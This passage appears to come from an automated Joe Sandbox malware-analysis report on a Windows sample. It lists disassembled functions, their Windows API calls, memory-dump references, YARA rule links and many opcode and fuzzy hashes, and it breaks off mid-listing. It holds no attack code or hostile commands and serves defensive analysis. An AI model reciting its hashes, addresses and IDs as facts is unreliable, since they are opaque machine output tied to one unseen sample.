                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessagePost$KeyboardState$Parent
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 87235514-0
                                                                                                                        • Opcode ID: c43deac456268518980e2d445fc184cb9d67f655e4d90ae42bd94ce82bec954f
                                                                                                                        • Instruction ID: 2a5d4e7a1b1f96e325617f309cc14afbe8a8c276494c597c50560d8cea99cd91
                                                                                                                        • Opcode Fuzzy Hash: c43deac456268518980e2d445fc184cb9d67f655e4d90ae42bd94ce82bec954f
                                                                                                                        • Instruction Fuzzy Hash: 8D51B3A15047D53DFB3783249C55BBE7EA97B86300F08C589E5DD868C2D294EC88F762
                                                                                                                        Function 0054542E Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetConsoleCP.KERNEL32(00553CD6,?,?,?,?,?,?,?,?,00545BA3,?,?,00553CD6,?,?), ref: 00545470
                                                                                                                        • __fassign.LIBCMT ref: 005454EB
                                                                                                                        • __fassign.LIBCMT ref: 00545506
                                                                                                                        • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00553CD6,00000005,00000000,00000000), ref: 0054552C
                                                                                                                        • WriteFile.KERNEL32(?,00553CD6,00000000,00545BA3,00000000,?,?,?,?,?,?,?,?,?,00545BA3,?), ref: 0054554B
                                                                                                                        • WriteFile.KERNEL32(?,?,00000001,00545BA3,00000000,?,?,?,?,?,?,?,?,?,00545BA3,?), ref: 00545584
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1324828854-0
                                                                                                                        • Opcode ID: 682d5176a5f3b3f1c0d048d993e3aceda236afee3b24c48ac106d56ed995fb66
                                                                                                                        • Instruction ID: 24808c6eb1eebcecf855a58c8dca5a9990f6fc865d75660e9bc5a7327662084e
                                                                                                                        • Opcode Fuzzy Hash: 682d5176a5f3b3f1c0d048d993e3aceda236afee3b24c48ac106d56ed995fb66
                                                                                                                        • Instruction Fuzzy Hash: 4B51E270A00649AFDB11CFA8D885AEEBFF9FF09304F14451AF955E7292E7309A41CB60
                                                                                                                        Function 005A6B76 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 131windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SetWindowLongW.USER32(00000002,000000F0,?), ref: 005A6C33
                                                                                                                        • SetWindowLongW.USER32(?,000000EC,?), ref: 005A6C4A
                                                                                                                        • SendMessageW.USER32(00000002,00001036,00000000,?), ref: 005A6C73
                                                                                                                        • ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,0058AB79,00000000,00000000), ref: 005A6C98
                                                                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 005A6CC7
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$Long$MessageSendShow
                                                                                                                        • String ID: @U=u
                                                                                                                        • API String ID: 3688381893-2594219639
                                                                                                                        • Opcode ID: 0e697621d9952cc67840213a7c0c9299afe9c12277914fe7d495b2076fc54496
                                                                                                                        • Instruction ID: 3b39315b6169eefebab93b79cc03f7a843ee7e4f72620e3c0e304cce5329afcd
                                                                                                                        • Opcode Fuzzy Hash: 0e697621d9952cc67840213a7c0c9299afe9c12277914fe7d495b2076fc54496
                                                                                                                        • Instruction Fuzzy Hash: CF418035A04104AFD724DF28CC68BAD7FA5FB0B360F190268F995AB2A1C771AD41DA50
                                                                                                                        Function 005910B8 Relevance: 10.6, APIs: 7, Instructions: 110networkCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 0059304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0059307A
                                                                                                                          • Part of subcall function 0059304E: _wcslen.LIBCMT ref: 0059309B
                                                                                                                        • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00591112
                                                                                                                        • WSAGetLastError.WSOCK32 ref: 00591121
                                                                                                                        • WSAGetLastError.WSOCK32 ref: 005911C9
                                                                                                                        • closesocket.WSOCK32(00000000), ref: 005911F9
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2675159561-0
                                                                                                                        • Opcode ID: 52c1d0984418bdefbaf55567892f54968910bd33872977c18160b35f4cdbc218
                                                                                                                        • Instruction ID: 04beafee710abd91a90cd2a77743609229ea6634105e9c3ca98ffbced2de8dcd
                                                                                                                        • Opcode Fuzzy Hash: 52c1d0984418bdefbaf55567892f54968910bd33872977c18160b35f4cdbc218
                                                                                                                        • Instruction Fuzzy Hash: 7C412531600616AFEB109F14C888BA9BFE9FF85324F148059FD169B291C774ED85DBE4
                                                                                                                        Function 0057CF00 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108filestringCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 0057DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0057CF22,?), ref: 0057DDFD
                                                                                                                          • Part of subcall function 0057DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0057CF22,?), ref: 0057DE16
                                                                                                                        • lstrcmpiW.KERNEL32(?,?), ref: 0057CF45
                                                                                                                        • MoveFileW.KERNEL32(?,?), ref: 0057CF7F
                                                                                                                        • _wcslen.LIBCMT ref: 0057D005
                                                                                                                        • _wcslen.LIBCMT ref: 0057D01B
                                                                                                                        • SHFileOperationW.SHELL32(?), ref: 0057D061
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
                                                                                                                        • String ID: \*.*
                                                                                                                        • API String ID: 3164238972-1173974218
                                                                                                                        • Opcode ID: b2adf41d0e0980f70a79bc6dd2825a0315901cbbea0c00f4b0856cc63b38b3cf
                                                                                                                        • Instruction ID: ada66f8667195852e43d9519554c622855c0565a0c124dc18f69882a95181e2f
                                                                                                                        • Opcode Fuzzy Hash: b2adf41d0e0980f70a79bc6dd2825a0315901cbbea0c00f4b0856cc63b38b3cf
                                                                                                                        • Instruction Fuzzy Hash: FA4158719052195FDF12EFA4D985BDD7FB8BF49340F0040E6E509E7141EA34A688DB50
                                                                                                                        Function 00577726 Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00577769
                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0057778F
                                                                                                                        • SysAllocString.OLEAUT32(00000000), ref: 00577792
                                                                                                                        • SysAllocString.OLEAUT32(?), ref: 005777B0
                                                                                                                        • SysFreeString.OLEAUT32(?), ref: 005777B9
                                                                                                                        • StringFromGUID2.OLE32(?,?,00000028), ref: 005777DE
                                                                                                                        • SysAllocString.OLEAUT32(?), ref: 005777EC
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3761583154-0
                                                                                                                        • Opcode ID: 0474edcad2e7263e74516c4668d85345bf8a3da32e1c24316ff9ec23f4350cde
                                                                                                                        • Instruction ID: 2c3f50426a146e8d2bc7d00069235f1cea404695fe4d317a572107786424b804
                                                                                                                        • Opcode Fuzzy Hash: 0474edcad2e7263e74516c4668d85345bf8a3da32e1c24316ff9ec23f4350cde
                                                                                                                        • Instruction Fuzzy Hash: CA21AE7660421DAFDF14DFA8EC88CBB7BACFB0E3647008425BA18DB190D670DC469764
                                                                                                                        Function 005777FD Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00577842
                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00577868
                                                                                                                        • SysAllocString.OLEAUT32(00000000), ref: 0057786B
                                                                                                                        • SysAllocString.OLEAUT32 ref: 0057788C
                                                                                                                        • SysFreeString.OLEAUT32 ref: 00577895
                                                                                                                        • StringFromGUID2.OLE32(?,?,00000028), ref: 005778AF
                                                                                                                        • SysAllocString.OLEAUT32(?), ref: 005778BD
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3761583154-0
                                                                                                                        • Opcode ID: 42e4ee5e4a53b2733488e71b0fa3ed74475d04ce6a6b0237646e61b3497c7384
                                                                                                                        • Instruction ID: f04f6c16220ee9e93ed60939c5d961383f60e93ca6d7507fa7efb3135eb97a5d
                                                                                                                        • Opcode Fuzzy Hash: 42e4ee5e4a53b2733488e71b0fa3ed74475d04ce6a6b0237646e61b3497c7384
                                                                                                                        • Instruction Fuzzy Hash: A0215E31608219AF9F109BA8EC8CDBA7BECFB0D7607108125B919CB2A1DA74DC45DB65
                                                                                                                        Function 005A5706 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 82windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SendMessageW.USER32(?,00001053,000000FF,?), ref: 005A5745
                                                                                                                        • SendMessageW.USER32(?,00001074,?,00000001), ref: 005A579D
                                                                                                                        • _wcslen.LIBCMT ref: 005A57AF
                                                                                                                        • _wcslen.LIBCMT ref: 005A57BA
                                                                                                                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 005A5816
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$_wcslen
                                                                                                                        • String ID: @U=u
                                                                                                                        • API String ID: 763830540-2594219639
                                                                                                                        • Opcode ID: 56df450c6b26b099d33aa84421eb53186bcf6070b79e5e17adef38816cd82d0d
                                                                                                                        • Instruction ID: a4284232c3d5620534d9205d8c27ffa105127e8976dad31e93bdc0d7ede0f324
                                                                                                                        • Opcode Fuzzy Hash: 56df450c6b26b099d33aa84421eb53186bcf6070b79e5e17adef38816cd82d0d
                                                                                                                        • Instruction Fuzzy Hash: EF219331904618DADB208F64DC84EEE7FB8FF56320F108616F919EB180E7709985CF50
                                                                                                                        Function 005804D2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetStdHandle.KERNEL32(0000000C), ref: 005804F2
                                                                                                                        • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 0058052E
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateHandlePipe
                                                                                                                        • String ID: nul
                                                                                                                        • API String ID: 1424370930-2873401336
                                                                                                                        • Opcode ID: 9163fb88ef69ad07d9bcbf2d9abde371c666f0f824b76126871922de985afc78
                                                                                                                        • Instruction ID: 9c7d3147b386a8114e02b5750a2c6f5bd12c813dd4f1ddfa126cea67167ce39d
                                                                                                                        • Opcode Fuzzy Hash: 9163fb88ef69ad07d9bcbf2d9abde371c666f0f824b76126871922de985afc78
                                                                                                                        • Instruction Fuzzy Hash: 90212C75600305AFDF60AF69D844A9A7FE4BF55724F204A19ECA1E62E0E7709948DF30
                                                                                                                        Function 005805A7 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetStdHandle.KERNEL32(000000F6), ref: 005805C6
                                                                                                                        • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00580601
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateHandlePipe
                                                                                                                        • String ID: nul
                                                                                                                        • API String ID: 1424370930-2873401336
                                                                                                                        • Opcode ID: 469c7f529e6904b28756ad76fc6052d83c925d50faf29598e57948f3ca456fbc
                                                                                                                        • Instruction ID: e5c723a863d6c6fe7cf82ad9c551b56497688e16fb38169c5e756eea4dd4cab2
                                                                                                                        • Opcode Fuzzy Hash: 469c7f529e6904b28756ad76fc6052d83c925d50faf29598e57948f3ca456fbc
                                                                                                                        • Instruction Fuzzy Hash: AB2153755003059FDB60AF6A9C04A6A7FE4BF95720F205B19FCA1F72E0E7709969CB20
                                                                                                                        Function 005A40AD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 0051600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0051604C
                                                                                                                          • Part of subcall function 0051600E: GetStockObject.GDI32(00000011), ref: 00516060
                                                                                                                          • Part of subcall function 0051600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 0051606A
                                                                                                                        • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 005A4112
                                                                                                                        • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 005A411F
                                                                                                                        • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 005A412A
                                                                                                                        • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 005A4139
                                                                                                                        • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 005A4145
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$CreateObjectStockWindow
                                                                                                                        • String ID: Msctls_Progress32
                                                                                                                        • API String ID: 1025951953-3636473452
                                                                                                                        • Opcode ID: 12330973ad5a0c88b0ba4e5418dedbe544a927d7a456d07af947f54c5f628b4f
                                                                                                                        • Instruction ID: cb4d0cc8cb859647043195d014e59a02076571dedb0c9a3cb7cb2736a4013ce4
                                                                                                                        • Opcode Fuzzy Hash: 12330973ad5a0c88b0ba4e5418dedbe544a927d7a456d07af947f54c5f628b4f
                                                                                                                        • Instruction Fuzzy Hash: 8311B6B114011D7EEF118FA4CC85EEB7F5DFF59798F004111B618A6150C6729C61DBA4
                                                                                                                        Function 0054D7DF Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 0054D7A3: _free.LIBCMT ref: 0054D7CC
                                                                                                                        • _free.LIBCMT ref: 0054D82D
                                                                                                                          • Part of subcall function 005429C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0054D7D1,00000000,00000000,00000000,00000000,?,0054D7F8,00000000,00000007,00000000,?,0054DBF5,00000000), ref: 005429DE
                                                                                                                          • Part of subcall function 005429C8: GetLastError.KERNEL32(00000000,?,0054D7D1,00000000,00000000,00000000,00000000,?,0054D7F8,00000000,00000007,00000000,?,0054DBF5,00000000,00000000), ref: 005429F0
                                                                                                                        • _free.LIBCMT ref: 0054D838
                                                                                                                        • _free.LIBCMT ref: 0054D843
                                                                                                                        • _free.LIBCMT ref: 0054D897
                                                                                                                        • _free.LIBCMT ref: 0054D8A2
                                                                                                                        • _free.LIBCMT ref: 0054D8AD
                                                                                                                        • _free.LIBCMT ref: 0054D8B8
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 776569668-0
                                                                                                                        • Opcode ID: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
                                                                                                                        • Instruction ID: 417ec84ad38db8e74e8797b67926e58fb58d938e5b93832e5d11f6772c22c25f
                                                                                                                        • Opcode Fuzzy Hash: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
                                                                                                                        • Instruction Fuzzy Hash: 1B114F71540B15ABE921BFB1CC4BFCB7FFCBF80704F800825B29DA6192DA79B5454660
                                                                                                                        Function 0057DA5A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 0057DA74
                                                                                                                        • LoadStringW.USER32(00000000), ref: 0057DA7B
                                                                                                                        • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0057DA91
                                                                                                                        • LoadStringW.USER32(00000000), ref: 0057DA98
                                                                                                                        • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0057DADC
                                                                                                                        Strings
                                                                                                                        • %s (%d) : ==> %s: %s %s, xrefs: 0057DAB9
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: HandleLoadModuleString$Message
                                                                                                                        • String ID: %s (%d) : ==> %s: %s %s
                                                                                                                        • API String ID: 4072794657-3128320259
                                                                                                                        • Opcode ID: a3e50674b9392eec5578a4a4c1b0e4618bff2f7d6d3b45e7e0f1088cc93f5f71
                                                                                                                        • Instruction ID: 47a6e13620e782190c6b3c9374313eeff20332fda4825a87478aa119a98b56a1
                                                                                                                        • Opcode Fuzzy Hash: a3e50674b9392eec5578a4a4c1b0e4618bff2f7d6d3b45e7e0f1088cc93f5f71
                                                                                                                        • Instruction Fuzzy Hash: 560167F25002087FEB10D7A49D89EEB3BBCFB05301F404456B709E2041E6749E849F74
                                                                                                                        Function 0058096B Relevance: 10.5, APIs: 7, Instructions: 35synchronizationthreadCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • InterlockedExchange.KERNEL32(0150E100,0150E100), ref: 0058097B
                                                                                                                        • EnterCriticalSection.KERNEL32(0150E0E0,00000000), ref: 0058098D
                                                                                                                        • TerminateThread.KERNEL32(00000007,000001F6), ref: 0058099B
                                                                                                                        • WaitForSingleObject.KERNEL32(00000007,000003E8), ref: 005809A9
                                                                                                                        • CloseHandle.KERNEL32(00000007), ref: 005809B8
                                                                                                                        • InterlockedExchange.KERNEL32(0150E100,000001F6), ref: 005809C8
                                                                                                                        • LeaveCriticalSection.KERNEL32(0150E0E0), ref: 005809CF
